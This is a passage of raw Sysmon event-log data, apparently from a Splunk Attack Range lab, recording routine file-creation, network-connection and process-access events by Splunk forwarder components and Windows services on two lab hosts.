Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53DB78AAE183ED3A566A2D121F51AA53,SHA256=1A83D4B6875663681BADF7B162F2D545F7252692337524A049542851BFB3C954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:21.782{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=517B9772A5D0D51872AE3B9B50C5261D,SHA256=CDE1972BF8DAE7A48F4116D969293B79269898374A1DB3D402E3E4CAC82CB9B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:19.204{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57951-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:21.148{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C88D0A75BC52A2C077EE440104366FB,SHA256=2A088AFA110AFC094124E4FA1073CF419E5DD5FF4843D911334F425E8ADF8442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979107Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:22.485{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67597BB098D320CD55B75BBBA329B6D2,SHA256=7EDAABBD35914E2CEA51C99BF7C6B2A63BC51D09AD8F31972DFA4A30059F84F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:22.804{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:22.166{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34AB129AC57986F1B7FAE9E2A94127F1,SHA256=70F7728D1645C43149339E9F1DAF75D16E0F5B65A333E95B0FB9C335E245D035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979110Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:23.485{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80FE223008332F18E132B79E930B824F,SHA256=1251F23EFE81CF6C115D726857BE8415A4BE9E16870FC68BB0E9940F0E0CDD14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:23.719{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC81003CF9F49AA733F96B8E3796AA06,SHA256=2D77ECCB6B3C83AAD2A76CF5CDC1E3EE0974EF4CA691D37FA32FF6822379DB58,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:20.908{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53387-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:23.184{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7DF28106E9836F3B8A7D40964D95B6F,SHA256=1AB154542FC491EAAAE32564CFEAD66D3C10566567C8EBE9F3E76B47BF059D69,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979109Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:20.174{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59281-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979108Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:23.001{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCFE5C3240E918AFA2A17B243E1E9387,SHA256=E30F391B2FE24D2D6F0E818B5FA4AFE4A545B1CF176D13826EC188604AC1A4EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979113Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:24.938{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3025814F5F99F02A7DB549B98082A8B1,SHA256=D4F2AA0518850F9859FFD5477F70D6F9B13E241AB1DE58752731E94BAF474DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979112Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:24.485{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26D5187891714326CD3141A6D7FF49EE,SHA256=9A3706A8A5AD224C8E235DBE8D9FE746A5EA281A643D197B7B293AADA0DD3E82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:21.748{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59606-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:24.482{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:24.204{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87AD14F3ACDF4FBF338A1F85F125DCC1,SHA256=C07B837A64B6E17B819020545BBB477950F7F293F582BA28E1A21E955E5D71C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979111Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:20.814{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59403-false10.0.1.12-8000- 10341000x8000000000000000979128Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.845{69CF5F33-8B35-6151-CE79-00000000FD01}3443324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979127Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B35-6151-CE79-00000000FD01}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979126Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979125Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979124Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979123Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979122Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979121Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979120Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979119Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979118Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979117Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8B35-6151-CE79-00000000FD01}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979116Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.704{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B35-6151-CE79-00000000FD01}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979115Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.690{69CF5F33-8B35-6151-CE79-00000000FD01}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979114Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:25.501{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE6B98EB37550A51B4D0B59606ACE95D,SHA256=3558C6E23CB528E85D122CD600D05D2E7DA0014F520580B86B6B3B562379F2D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:25.250{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED341E51920A569AF965EC70AC0DC18,SHA256=B65B77F265683CB622CBC37FB0D1B9A622F657A7BACBB7D0F0AE82CCC9899056,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979158Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B36-6151-D079-00000000FD01}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979157Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979156Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 